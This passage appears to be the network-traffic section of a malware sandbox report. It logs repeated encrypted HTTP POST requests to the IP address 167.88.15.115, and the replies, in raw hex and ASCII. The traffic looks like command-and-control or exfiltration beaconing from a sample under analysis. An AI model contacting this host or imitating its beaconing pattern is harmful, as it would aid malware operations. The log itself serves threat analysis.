Aug 28, 2021 00:06:42.043344021 CEST	6385	OUT	Data Raw: 3a 6f 87 54 05 b4 03 9e 54 f7 3f cc 0f 18 6d a2 99 1d 56 ba 8e 44 80 d3 ce 2e 8d 2a f0 f6 4d fe 27 35 f6 79 c5 e5 40 d3 cc 5f e3 c4 45 6d f1 af 5d 82 d2 03 45 0f 2e f5 ed b2 84 d6 28 d8 ad 5d aa 3f a5 d9 21 f3 dc b3 dc 82 ec 30 5f bb 8e 61 3b dc Data Ascii: :oTT?mVD.*M'5y@_Em]E.(]?!0_a;n$Kaii %!3%#J?9` iRt~#Mc&iX>brO;Do'~xv5:s_d8tQTd>yxr7+ E@J_Rng
Aug 28, 2021 00:06:42.442814112 CEST	6387	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 235 Connection: keep-alive Data Raw: c4 c1 3b b2 11 be 5c 43 30 ff 1c da 28 fb c9 94 c1 ce dc 07 86 d2 35 b8 42 81 27 69 4a ba 89 66 c1 56 ba cc 3a fb 3a 4f 6b ec 34 bc b8 6f aa 28 c3 f9 4e cb d9 92 e9 ab b0 cd 2f 44 a4 34 d5 a3 94 21 7b ff fc 0c 01 eb 94 c0 29 1b 39 e6 d5 95 6e 06 b2 35 62 fe 14 b2 34 19 1d f3 b3 e0 82 a6 59 ad 11 14 37 58 4e 28 6c 4f 5f 22 3e 4c e3 8f 23 9e 0c 05 52 ee cc 51 f0 1d 2d a4 1e 23 76 65 9d a9 2d 2d d0 ca b4 43 bd 48 88 ed 54 f0 9f 71 3f 35 6e ee 93 22 c3 4d d5 31 00 32 80 66 8b 3c db 17 ae a4 80 3f 6a 3c 24 4d 0e b3 35 64 4c cb 20 a5 d5 48 3c e0 1e 63 f3 2e d3 05 c7 42 1d db 2e 1b d2 68 7a 87 ed cc e8 46 96 58 09 2b 95 d2 26 37 60 8d bc 46 68 68 2b 99 d9 0d 2d a0 5d 8c 6f 84 73 5d e6 d3 84 be de 98 9d Data Ascii: ;\C0(5B'iJfV::Ok4o(N/D4!{)9n5b4Y7XN(lO_">L#RQ-#ve--CHTq?5n"M12f<?j<$M5dL H<c.B.hzFX+&7`Fhh+-]os]
Aug 28, 2021 00:06:42.554249048 CEST	6387	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 588
Aug 28, 2021 00:06:42.683540106 CEST	6389	OUT	Data Raw: 9a d0 0f 97 5c 93 9f 71 77 7b 79 0a eb e0 30 d5 a7 37 84 f0 c0 bd 5d 77 1c f5 86 69 01 74 bb 07 4b 0d 70 ca d3 3a 14 99 04 7f fb d3 38 f3 ab 1a 59 1c d3 a6 2e 1f ee db 73 97 7c 65 0e 36 70 03 be 72 be df 70 64 03 6e 24 ea ed 42 c0 89 3f 28 4b 6d Data Ascii: \qw{y07]witKp:8Y.s\|e6prpdn$B?(Km,W<5fB1YT&bu_!3ty:oxmjj,SzTub(TdFtx0NOw5x%oQ)hGoq-n$k$HO_?>f
Aug 28, 2021 00:06:43.081392050 CEST	6391	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 135 Connection: keep-alive Data Raw: fa 77 30 56 8d 5b e1 e7 de da 82 04 ac 2b 9f 58 07 41 2f 9a 07 a1 18 86 c7 08 2d 6a 6b be f8 d5 f0 57 4a 24 e8 09 93 13 f3 36 d6 07 62 a3 f4 50 f5 fe 01 16 40 6e 00 39 4c 9f 16 54 80 e3 7b d3 3d 42 5d 95 3e 32 60 3f f6 08 03 92 50 dd b2 04 47 80 96 60 cb 74 11 cb a4 7c 6c b6 fa 53 d1 11 17 a5 44 1f 61 43 6b d4 ea b7 f0 22 d6 dd 52 9d a3 14 05 38 9f 0a 01 b4 4e 2d 92 fc 56 ae 53 68 fb 28 c7 9c 8c 9d 3e Data Ascii: w0V[+XA/-jkWJ$6bP@n9LT{=B]>2`?PG`t\|lSDaCk"R8N-VSh(>
Aug 28, 2021 00:06:43.194658995 CEST	6392	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 427
Aug 28, 2021 00:06:43.324584961 CEST	6393	OUT	Data Raw: e7 fd 72 f8 60 69 99 6d 14 53 cc 8e 4e 0a e8 42 f9 10 70 a7 5c a7 8a 80 a3 c5 83 5e 22 55 84 e8 55 ce dd 04 2b 7a 0e 26 81 2d 4f 8c 47 2e 5c e4 8b 0f 7a 23 fd 95 04 41 73 f0 55 9a e5 3c 4c bd cd e2 3a 7f 2c e4 18 80 03 4b 26 30 59 fd 39 76 6a 9d Data Ascii: r`imSNBp\^"UU+z&-OG.\z#AsU<L:,K&0Y9vja9%s?Fd!pu0Ih9mzU\N@-@7OEDPly),P5\e<-+;]LheB*, Q,~.I%+Wo4%h.{y(q/
Aug 28, 2021 00:06:43.720963001 CEST	6394	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 137 Connection: keep-alive Data Raw: 2c be 0b 96 30 8e e3 50 7a 41 ad 84 e6 c2 e5 73 ca 31 a3 ac f4 13 aa e0 ba 9c 68 61 f9 30 e3 ff 8d cb 95 8c d5 fb 0e 4d 0f ba 4f d9 1d a6 c8 73 71 2f b7 0e 39 5a 65 a3 00 40 94 60 6b 7f ff 37 5d c5 55 b9 2e 5b 99 f5 2c 2c 08 4c 91 8c 91 5d 3d f6 f0 e0 48 3f 77 a0 09 ee 8e 28 74 e9 6c 12 e3 b4 d3 94 ca b8 25 9b 71 bf 19 eb 8e 43 c0 dc bc 42 b8 70 db ca 9f 4f cd 69 d2 37 2c 12 37 d7 34 27 bf 74 66 a5 df 46 c0 Data Ascii: ,0PzAs1ha0MOsq/9Ze@`k7]U.[,,L]=H?w(tl%qCBpOi7,74'tfF
Aug 28, 2021 00:06:43.835500002 CEST	6395	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 290
Aug 28, 2021 00:06:43.965969086 CEST	6396	OUT	Data Raw: 27 28 b9 0c cb 81 f1 3e 78 af 2f 34 da 24 57 ea 30 26 8b 46 5f 41 f7 2a 38 6f 63 75 fc cd 14 83 db ad 25 1e 25 e2 78 7b df 08 8c a8 2d 6d be e9 3e 78 d4 44 81 ab bc 00 ca 3d b2 b0 b6 e0 d0 9f 59 c9 d7 5c 93 a9 9c 68 8b a3 39 3b 3d d1 86 80 d2 7b Data Ascii: '(>x/4$W0&F_A*8ocu%%x{-m>xD=Y\h9;={QW!j-@~KRpzaz(v~iQGF?A\\|;X~mYla\|\|Fc>pPFV4tpNG3K<6fq>M$
Aug 28, 2021 00:06:44.365314007 CEST	6398	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 133 Connection: keep-alive Data Raw: 52 ae 36 2a f3 61 24 2c 72 29 87 fe c3 c5 c4 80 fd 97 e4 1b 89 53 3f 8c 34 bb f4 5a 95 74 f3 8f a7 77 8b 4f c6 ed dd 67 20 88 78 7c 67 8d c1 2f ad 9e 75 f4 00 09 d5 c9 49 01 63 5d bf 81 4c 25 08 1c 91 09 1c 9b 1b cd c3 43 88 38 bf 22 53 5d c9 7b 98 5f 41 5c 60 e7 ba cf 52 0a 6d 74 fa 0b 77 1c da 05 e3 ea d5 91 39 de d4 f4 be a3 e4 f5 14 42 57 e5 b2 e3 2c 80 39 01 cd 36 7b 84 a6 2f ee 4e 95 bf 6c Data Ascii: R6*a$,r)S?4ZtwOg x\|g/uIc]L%C8"S]{_A\`Rmtw9BW,96{/Nl
Aug 28, 2021 00:06:44.475924969 CEST	6398	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 515
Aug 28, 2021 00:06:44.609019995 CEST	6399	OUT	Data Raw: 6b 98 3a 6f a2 10 7a 42 f5 fa de 64 7b 82 01 fe e1 2e b0 76 bd 04 d5 1e a8 ae 94 c6 64 d7 d0 5f 17 9f 8a 8e 4c b8 49 59 90 93 40 8e 46 f9 6a b2 cf d6 22 4c 4d a0 cd 67 c2 1c c5 f3 7b b3 dc 1f 2b 80 4d da f7 72 b3 2a e3 57 e5 2b c2 47 d7 ae 44 e1 Data Ascii: k:ozBd{.vd_LIY@Fj"LMg{+Mr*W+GDv#0U"d^$g{DOgn7xt(j/~OFgW}/2q%RWW\3#,0BF{9`dJ"wv0DA?_
Aug 28, 2021 00:06:45.009582996 CEST	6401	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 182 Connection: keep-alive Data Raw: 26 73 05 fa 07 da cb 6a 7f ca 2f f9 9a 4f e4 18 5e cd 19 16 c3 6b 50 a7 b4 e7 58 1c 08 c0 ba fd 23 e7 9d 2e 25 8e e2 33 d9 69 3f d9 d2 16 bd 08 50 7c 41 55 28 a3 5c 34 81 51 4d 5e 4d 57 88 f3 e5 14 9d 60 5b 93 bb 5e af 15 31 45 14 ab 66 38 8c 48 f9 2f 04 5d c7 bf 5d a5 03 a7 05 aa 8a c7 d2 2a c3 1b 4c 00 f9 84 78 37 95 7e 8f be f7 d4 30 97 ae 3c 91 0e bd a6 c1 ac c3 8f 4e 5c 02 34 16 c0 be c4 40 fe 83 c2 2e f1 ee 6d 97 54 ae 03 fd 7e 57 1a 59 d4 80 e2 d1 91 a3 93 8e 9f 23 46 80 a0 48 65 d3 b4 70 46 13 b0 23 48 85 34 bb 07 1f be e7 7f 62 17 Data Ascii: &sj/O^kPX#.%3i?P\|AU(\4QM^MW`[^1Ef8H/]]*Lx7~0<N\4@.mT~WY#FHepF#H4b
Aug 28, 2021 00:06:45.116950989 CEST	6401	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 298
Aug 28, 2021 00:06:45.246277094 CEST	6402	OUT	Data Raw: 25 12 8d 60 82 c6 4d 9c e8 92 cf 4a f4 de 05 e7 ec 7b 37 af 49 0b 2d f0 bb ad 53 c4 d1 05 d6 75 c5 8f e4 e8 93 de e2 bb f0 78 ee b7 8d 38 a1 50 95 dd 69 77 f6 45 d5 1a e4 9b a4 d4 73 88 ca 00 16 83 ee f0 b5 be 6b d7 32 43 b4 51 14 2d 9f cb 82 22 Data Ascii: %`MJ{7I-Sux8PiwEsk2CQ-"J3{J7-X3O-egsr7b0K.:=e$H1$1gyWi@>.]ramn{}]B6&OK{jIs#%>CCoe<
Aug 28, 2021 00:06:45.646918058 CEST	6405	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 181 Connection: keep-alive Data Raw: 19 d8 ee bf c9 d2 e9 48 bc a0 da 8e 36 bf a7 53 bc 66 eb ea 5d 4d 59 6b 5f 35 05 d9 9e 33 19 f1 b0 fc 18 0f ec 0a 4e d3 75 f6 90 20 66 1f 50 9f 72 53 be 9c 0e 8c 9e 26 b6 ba 13 e5 d8 4e 79 81 c5 fe ee 75 be 69 a9 5c ec e4 a4 86 10 d7 cb 7d 5c de a6 1a df 2d 7d 8b ad 1c 4f 34 76 5f 18 6e 69 8a 06 1a 00 d8 5d e1 78 8a 6e f5 51 f3 c5 66 34 8b 15 39 06 ca 1e 42 48 13 35 bf 70 f5 26 04 d9 c2 f8 e0 f0 a9 66 e0 84 6d 27 dc 90 e6 c6 86 42 a8 bd 29 b0 52 33 bf 46 b4 34 13 71 20 ff 9a 07 16 73 16 7e d9 56 fb 55 d5 32 eb d9 35 b0 f2 54 a2 25 f9 c2 Data Ascii: H6Sf]MYk_53Nu fPrS&Nyui\}\-}O4v_ni]xnQf49BH5p&fm'B)R3F4q s~VU25T%
Aug 28, 2021 00:06:45.782461882 CEST	6407	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 729
Aug 28, 2021 00:06:46.317941904 CEST	6411	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 239 Connection: keep-alive Data Raw: 0c 3b c0 f8 08 25 8f 78 01 59 01 2a 6a 30 fd 69 4d be d6 30 a9 88 a0 8e 05 4b d8 05 b6 18 74 d4 95 cc fc da c8 1a b6 8c bd da 86 85 77 7a 8e d6 25 8a 72 f0 35 59 ee f4 19 53 26 27 5a 48 c0 da 9a 81 fd f7 77 bc 5b ac cf 72 38 21 fa 1e be 7e 1a 10 2e 03 df 98 08 24 d3 30 ea f6 db d2 8e 22 58 6a 08 1b 75 62 d6 73 c9 75 7c 37 8c d7 e3 d9 64 cf 1e 69 95 36 26 28 95 88 24 de 36 81 c2 02 77 0b 37 19 77 a7 40 a7 c4 ae 77 d2 4c 75 0c a5 50 3a 37 a8 3a 1a 13 9d 5d d2 56 da c3 4d 00 cb 73 be e9 b9 cb ba d3 48 2f 81 68 ee 7e d1 ce 52 3d 1d 1a 00 1c 09 f9 a1 57 60 6e 2d 4d b3 38 ed 06 0c ad 94 83 d8 80 71 1e 6a 4d e2 a0 2b df de 15 90 69 1d b0 f7 cc 9b d3 c5 34 20 f5 7c 1f 47 27 d4 35 2f de d5 17 db 86 62 d6 5b 63 3b ca Data Ascii: ;%xY*j0iM0Ktwz%r5YS&'ZHw[r8!~.$0"Xjubsu\|7di6&($6w7w@wLuP:7:]VMsH/h~R=W`n-M8qjM+i4 \|G'5/b[c;
Aug 28, 2021 00:06:46.429582119 CEST	6412	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 509
Aug 28, 2021 00:06:46.955878019 CEST	6416	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 296 Connection: keep-alive Data Raw: 7f 31 91 c6 0b b0 5b 2a 9d 70 bb ea 6a 66 db 08 a1 c6 e7 2d 74 29 78 ac 85 40 1d 91 4d 02 56 4c f9 4e 49 0b d6 46 97 65 a1 e8 b1 49 28 d2 6b b9 8f 19 ef 5d 9f e4 c3 39 29 3a 4c 66 01 d7 97 2e 56 f2 da f2 67 78 95 97 de 28 93 18 8a db 1c 5b 9c 2b 8a b5 72 86 01 8b f9 cc a1 02 fd 0c 31 1c d3 da 3f 0f 2a 5f 31 91 fc e6 12 f8 b3 49 37 b9 d9 8a f7 90 f7 7c 0f c0 40 31 b0 be ad 5c 6b d2 9a 02 0a 96 a8 35 6f cd 04 6e ff dd 6c df c7 9b 94 15 ab 98 c6 b4 d6 48 2c 9a 40 58 73 a9 2c f3 86 6f ba 87 c3 a8 d6 bf 7f 9e 5b 1d fe b9 e5 1c a3 38 0b e2 8a 98 21 89 fe d6 65 17 c4 73 7e 3d 2c 6d eb a1 81 34 69 b9 b4 43 cb 91 de c3 3d 53 f6 4b b8 4b 6d 0d cc 00 7e c6 9d fb 69 d6 fa bb e1 90 10 05 4a b4 25 cf 68 67 c8 15 ed cc 74 19 95 53 14 93 9f 6c ca 60 14 5b 42 e4 0d 55 9c 34 cf fb cd 9e 51 b6 4c 5c 8b df f5 19 e9 68 89 3b bc 31 8c 04 16 90 7e 8b e2 2c 47 67 b6 90 26 8f ce 5c dc 8b 8c 5a 85 f1 Data Ascii: 1[pjf-t)x@MVLNIFeI(k]9):Lf.Vgx([+r1?_1I7\|@1\k5onlH,@Xs,o[8!es~=,m4iC=SKKm~iJ%hgtSl`[BU4QL\h;1~,Gg&\Z
Aug 28, 2021 00:06:47.070255995 CEST	6417	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 451
Aug 28, 2021 00:06:47.608779907 CEST	6420	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 254 Connection: keep-alive Data Raw: fa ab e0 18 de 06 59 90 c5 63 d2 1a 3b 8d 0e fd 07 20 dc a9 df fe de 75 e0 6d 1c 8c 50 1a bc 0d 47 e1 a6 15 5a d1 e6 4f 21 3c 93 7a 78 47 0d 09 c3 02 2d 9e f6 90 70 9e 4c 85 2c 2c 36 ce 28 49 fb 6e bc 52 7a 28 4a 1a 04 47 1a eb c3 e4 5d 27 d7 3f d0 f4 38 7d fe b1 75 41 65 28 01 f9 d8 36 a3 f4 f8 02 a5 a7 2a bc 8e 62 a3 f3 cd 8b 59 b9 78 04 4e 6d fc 6f e3 74 10 8b bb 2b ac c6 4f 25 9b 02 f8 f0 13 e8 de 6a 90 da a3 83 21 bb 1a 6a fd 43 ee 35 7e 0d 8a d3 29 24 9c 49 4a fa 89 7d 84 79 4f f2 15 ad c5 54 40 35 27 9d d1 00 13 fc db db bb 4d f1 31 14 2d e1 93 d8 4c fb e3 d0 87 94 26 75 9d 86 3b 5f 5a d7 4e a4 1d a0 de 2f de aa 14 9c f0 52 3e ae da c5 2f 7e da 35 b8 16 89 04 7d ec e3 56 cb d1 c8 84 ba ed 51 59 a9 19 ec bf 45 5f 4a e3 29 0a bd 5b dc 24 ae 24 f7 Data Ascii: Yc; umPGZO!<zxG-pL,,6(InRz(JG]'?8}uAe(6*bYxNmot+O%j!jC5~)$IJ}yOT@5'M1-L&u;_ZN/R>/~5}VQYE_J)[$$
Aug 28, 2021 00:06:47.726519108 CEST	6421	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 572
Aug 28, 2021 00:06:48.262350082 CEST	6423	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 244 Connection: keep-alive Data Raw: 51 da 77 44 e4 f2 61 be 18 64 3c a3 c3 e6 ee 65 2c d0 59 f5 2d c9 ad 8d a3 28 56 13 44 0d 78 01 22 50 9e ce 21 97 ed b5 96 c7 81 04 cd 52 b6 29 02 0d de 61 48 56 8e 92 f1 05 9c f6 c8 3c de 4f a4 65 f1 1f 56 8c ee 8d e5 b0 29 46 a8 a9 76 d4 2e 1a 2f 24 f6 82 66 73 43 cf 4d bb f8 25 c6 e8 20 3c eb d7 a3 71 26 e3 24 b6 40 6d 45 05 25 66 a4 e6 f1 9b 09 95 59 b5 52 b7 af 15 1c 0e b6 19 e4 0c 48 d5 19 2e 4e 9e 4c 71 a1 0c 61 45 20 f9 02 6c 0a 6d a8 e2 1f 5a e3 d0 b3 56 f8 60 36 d8 72 24 44 00 16 88 87 fd d7 2d e9 e4 58 0d 72 63 e9 09 86 e7 37 cc f2 2a e1 a8 ba 92 41 6a ce de 14 97 24 96 11 45 ac 09 44 6f 24 c8 86 67 48 c8 58 99 a2 75 c5 90 8b bb 25 7b e1 80 f6 e0 15 c5 a1 70 11 d4 94 d1 8e cc 95 a7 aa 3f 3f c5 38 bd c3 6a a2 1f Data Ascii: QwDad<e,Y-(VDx"P!R)aHV<OeV)Fv./$fsCM% <q&$@mE%fYRH.NLqaE lmZV`6r$D-Xrc7*Aj$EDo$gHXu%{p??8j
Aug 28, 2021 00:06:48.367203951 CEST	6424	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 555
Aug 28, 2021 00:06:48.900506973 CEST	6427	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 240 Connection: keep-alive Data Raw: 98 a5 36 54 17 2f 41 bb 47 b5 ff 2f 3d e9 bb 3c 5a 01 ad f8 ba 65 fb 36 bd a3 a7 67 fd 95 58 9b 99 c7 ea 7a bb 94 76 a1 2a f1 c8 4b 96 e4 8d cb 77 e0 57 26 f0 79 62 5e 43 02 f3 88 f7 81 58 34 f7 bc 14 3b 6a ac f6 f7 df e4 48 8f 42 be f3 75 9c 60 87 47 10 04 2d 07 09 ca 23 59 4c 7b 03 b4 fa f0 20 54 ab 19 d5 9c 12 8c d5 88 c2 28 92 24 b2 3f d9 a3 e5 0e a6 a8 91 be a5 99 52 03 c4 19 30 8c a2 83 d2 3c f8 2f e1 a5 e4 b5 80 67 93 bd 9a 06 bb d5 63 d4 9e 23 8a c9 bc 5e 17 a4 e6 00 26 b9 eb 1c 7b d5 84 d1 d0 77 76 dc 16 bc 43 c0 11 6e 7a b0 63 aa af 59 c0 d6 d3 a4 3c cd c0 8b 16 e9 63 1b d1 5e c1 0a 3c 98 ef 3f 6a 3b f0 39 cd b5 67 63 fb 0e f4 ce 67 08 45 55 02 a1 a8 b2 21 fe f9 38 17 6f 68 2e 58 66 83 e0 01 98 e6 b7 Data Ascii: 6T/AG/=<Ze6gXzv*KwW&yb^CX4;jHBu`G-#YL{ T($?R0</gc#^&{wvCnzcY<c^<?j;9gcgEU!8oh.Xf
Aug 28, 2021 00:06:49.025424957 CEST	6428	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 589
Aug 28, 2021 00:06:49.563631058 CEST	6431	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 268 Connection: keep-alive Data Raw: 6c c1 21 90 63 c1 81 fe 07 52 b0 8e aa 03 aa db 06 83 7d 2d 61 e7 37 3d 9f 5e 69 7e 48 6e fe 9a 6e 2a 05 1d 3e cb 10 09 e1 33 6a cd a8 3b f5 11 01 99 61 d1 bb 7b 90 81 3d d1 07 39 77 84 e0 d4 33 06 2e 1a 51 c4 62 9b 9a be ef 4f b6 f0 96 69 6a 56 4f 8c ed 22 3a ee 61 13 e7 5b 08 fc 59 93 51 39 e6 7d f4 5d 7e e7 7d 0b c9 9c 21 09 12 a3 ce a7 a1 c0 3a 53 51 e5 26 9f e6 66 39 86 e4 51 3c d3 28 e0 05 af b0 b3 16 74 36 d9 8e 7f 68 4c ee c2 3a 42 e9 2f ec 8f 89 92 3c be 27 37 85 56 b4 9b 70 6f 07 f1 86 7d 55 88 1a 81 36 56 08 d2 c5 d6 0a 4c b5 92 4c 52 34 1e 66 00 e5 27 9a ae 34 0e ee 8e e6 33 4c 2e 30 7a b0 60 b7 eb c0 e0 95 ae 32 69 e8 ba 3f 44 86 02 84 f3 ca c4 fc e2 e0 02 b9 98 70 5b e3 a1 5d b9 3b 15 3c e6 77 f2 a2 9f de 5e db 29 b8 f5 ac 9a 3f c4 10 4a f2 61 d1 d8 93 19 1d 66 29 8b 2a a3 80 da Data Ascii: l!cR}-a7=^i~Hnn>3j;a{=9w3.QbOijVO":a[YQ9}]~}!:SQ&f9Q<(t6hL:B/<'7Vpo}U6VLLR4f'43L.0z`2i?Dp[];<w^)?Jaf)
Aug 28, 2021 00:06:49.679606915 CEST	6431	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 738
Aug 28, 2021 00:06:50.209423065 CEST	6435	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 267 Connection: keep-alive Data Raw: c2 2b d2 d7 eb 9e c5 33 07 dd 22 bb c0 be fb ee 90 6b b0 df 7c 8a 21 cb 43 ca 45 67 ba f0 a6 bc ef 43 4e bd 59 d7 a9 90 5b c0 b1 bf 9e 06 a0 2a c7 51 b5 67 4d 39 c1 c3 82 ca d7 e5 42 f0 97 5b 54 05 84 80 52 3c 0e 04 d0 d8 f7 61 f5 4f 51 bf db 4c e6 31 cc 28 d3 8d 51 6d f9 54 28 17 bd 1e c2 36 fb 22 3c dc 54 53 d3 90 c4 08 7b 31 76 03 e2 62 42 db ff 33 4b 1f a3 fc a5 a5 b7 a6 54 ec 9c 79 e9 1b 53 dc 3f f9 b1 a6 c3 4b c7 df a9 8d 50 c7 88 15 ea 55 fd 37 de 4e b7 5c bd 89 46 34 36 86 23 21 57 c9 a7 66 4f 29 ad 42 55 09 1a 91 89 22 f7 f4 22 15 7f f5 b4 95 00 5c 3c d9 4c 34 5b b2 0c 6a 35 5b 14 0b a6 b4 cf c9 b8 40 ed ce ef 46 95 ce 49 8e e2 ca 6d 72 f8 23 30 83 21 34 61 7a 42 e8 3e e9 f9 84 23 6d d5 e1 6b 61 80 4f f8 07 4c 8f e4 cb 3f 30 c8 45 9e 96 00 df 01 ad ba 96 d1 b2 41 74 13 80 4d cc bd Data Ascii: +3"k\|!CEgCNY[*QgM9B[TR<aOQL1(QmT(6"<TS{1vbB3KTyS?KPU7N\F46#!WfO)BU""\<L4[j5[@FImr#0!4azB>#mkaOL?0EAtM
Aug 28, 2021 00:06:50.367368937 CEST	6437	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 737
Aug 28, 2021 00:06:50.888488054 CEST	6442	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 329 Connection: keep-alive Data Raw: 15 7e 18 01 ef 4c 86 c8 a7 08 96 8b 78 d3 f0 f4 76 9c 60 4c 3d b8 59 6e 62 7f 03 be 51 8b d4 7f 4f 99 21 1d a9 97 23 12 2a 6a 37 93 68 06 dc 1d 0b 87 fe 39 95 6c f6 fa b1 37 e3 99 dc b2 fd 9b 29 dc 7c e4 9e ff 1c 04 a4 bb e7 8f a5 49 4e bd 3a 7f 8a 61 c5 48 d7 07 64 74 2a 4c 5b 0a b9 f1 1f b2 89 d6 26 61 10 aa 85 06 43 7f 97 0c 13 e1 48 56 6f 58 16 c4 d3 64 39 c5 0c 7f 5e 05 ac 58 51 e3 ad c0 6e 6b 03 80 b3 15 d3 90 3a d6 9f c2 03 43 07 0f ce 96 92 68 ad 52 87 d8 48 10 d2 ff a9 8a 13 e9 07 34 5d 86 05 c3 32 98 42 18 44 cf b8 07 7e 99 40 2b a8 01 9e c0 9f 86 58 df 51 2f 82 53 2f 99 f1 1f ce 2f 8c 8e ca c9 02 cb 45 e3 63 f8 f2 cd 0a dd ef 8e 63 4f d5 e0 80 7f 15 a2 fc e5 c9 1b 25 40 73 52 96 c7 d2 93 f5 72 95 42 5b ad 2d ce 93 1c 82 6e 00 d3 88 10 08 5f bc e3 6e 45 86 e3 44 50 89 55 21 19 d0 f0 3b 72 a1 77 b5 67 da 52 3c 3c 90 5f 9a ce 55 95 81 0c 7e c8 45 30 b8 09 0d d4 29 f4 33 6a fd 7c 92 f3 73 ec 40 23 1c 2f c6 85 56 91 ee 34 6e 3d b5 83 c6 28 d4 6d be eb 42 df 06 0f 95 Data Ascii: ~Lxv`L=YnbQO!#j7h9l7)\|IN:aHdtL[&aCHVoXd9^XQnk:ChRH4]2BD~@+XQ/S//EccO%@sRrB[-n_nEDPU!;rwgR<<_U~E0)3j\|s@#/V4n=(mB
Aug 28, 2021 00:06:50.992202997 CEST	6442	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 433
Aug 28, 2021 00:06:51.531799078 CEST	6445	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 181 Connection: keep-alive Data Raw: 34 7f 7f db ea 34 79 05 6f 54 6e 2b 35 c9 f8 45 bb 92 48 da 04 24 ed 34 2b 8c 11 26 35 0d 3e 61 b5 70 92 a2 62 34 d1 7e 25 40 04 6c cc b0 4a 7f 9e a8 a6 3c da d3 ad 01 35 84 40 81 91 6d 6c df 49 60 e7 a4 a2 18 5a 83 dd 7a 8d bc ec 0e 45 ad c9 20 cc 79 2c 99 f6 13 c6 0a ad a6 21 c9 5f 25 80 85 29 5d 00 a3 55 76 93 cb ce f3 92 4f 10 2d e4 b9 ae 80 f6 ce 89 8d 0c 90 4b 05 bb f2 b7 05 91 b0 01 10 b7 18 14 b6 60 0e 55 43 e1 7c 00 7f df 55 91 bb d1 bf 31 c0 83 96 f3 8a 7c c7 53 07 19 4f 6f 01 73 54 28 a8 52 60 66 4f dc ba ee ce 72 ed 0b 88 68 Data Ascii: 44yoTn+5EH$4+&5>apb4~%@lJ<5@mlI`ZzE y,!_%)]UvO-K`UC\|U1\|SOosT(R`fOrh
Aug 28, 2021 00:06:51.648930073 CEST	6445	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 537
Aug 28, 2021 00:06:52.175220966 CEST	6448	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 175 Connection: keep-alive Data Raw: 32 54 30 e3 13 87 73 d6 67 da b8 e4 32 f3 0d 4d cb 68 9e 03 59 a4 71 87 0d ee f0 e1 89 50 8e df f6 dc 9d 8a 8a 46 41 25 3d f2 f0 65 5c 63 51 0d cb 30 5b 88 40 26 a6 b1 03 ae 7c ed 33 ce 1f 2b 86 16 6b 4d 6f a7 44 a0 69 f9 af 3c 78 6d 8c d5 19 48 2f 01 e2 c1 e4 92 f1 08 16 b5 b0 f4 00 16 2e 6a d7 9d b3 f9 ce 22 bd 20 ef 5d c2 ce b6 ab 6d 6a d5 14 db 29 59 54 4f c8 e0 36 18 23 ee b6 dd ad 6c a1 a9 c4 2f 37 a5 25 40 6a d6 f2 b9 38 6f d2 2b 85 e4 c2 9d d9 32 3f 25 e2 6c e4 55 46 18 78 f3 7a 4d 77 13 27 6d c5 6a 56 3c 98 51 Data Ascii: 2T0sg2MhYqPFA%=e\cQ0[@&\|3+kMoDi<xmH/.j" ]mj)YTO6#l/7%@j8o+2?%lUFxzMw'mjV<Q
Aug 28, 2021 00:06:52.289153099 CEST	6449	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 728
Aug 28, 2021 00:06:52.824470997 CEST	6452	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 280 Connection: keep-alive Data Raw: 6c d0 57 29 5a 8c 12 bd 58 65 20 ff 90 34 a7 fb 1e 3d c2 60 97 19 69 28 fb 18 2a 09 03 6f 29 6e 3c cb 14 ff ff 43 5f bd 82 80 7b 77 2b 8c 75 d1 21 9d fe bf 54 78 6e 86 3a a9 d6 8c 11 e7 93 bd a3 12 ca 83 9b cb c5 e5 76 6b 68 0c da 2d 8b 4d 89 a5 43 5a 71 88 a6 99 e9 df 3c 45 a5 8d 52 36 42 21 49 ce 8f 44 87 4a e1 21 c0 18 ab 22 69 a7 54 15 91 1e 80 a6 b0 fb 95 2d 1f d6 99 33 ad cf de d0 0b 1e b4 bd c7 ea d5 fb 63 e3 35 b0 65 cf 35 c8 fd 11 0c c0 fd b1 aa 53 7d af be ec 8e 71 61 a5 6b 9a fd b2 ef 8e e4 da 49 37 ea 7a 35 43 e9 94 08 ce 6d a0 22 ad 6e 54 2a e8 36 ff 3e 24 43 db c1 f5 6d 52 1a 00 ac 4f 4d e5 82 e5 8d a3 a5 c9 7e b8 6a e7 67 25 30 2d 01 68 3b a1 88 57 3f 